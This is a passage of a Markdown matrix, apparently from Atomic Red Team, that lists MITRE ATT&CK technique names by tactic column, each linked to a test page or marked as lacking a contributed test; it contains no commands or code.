| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Direct Volume Access](../../T1006/T1006.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Rootkit](../../T1014/T1014.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Network Share Discovery](../../T1135/T1135.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
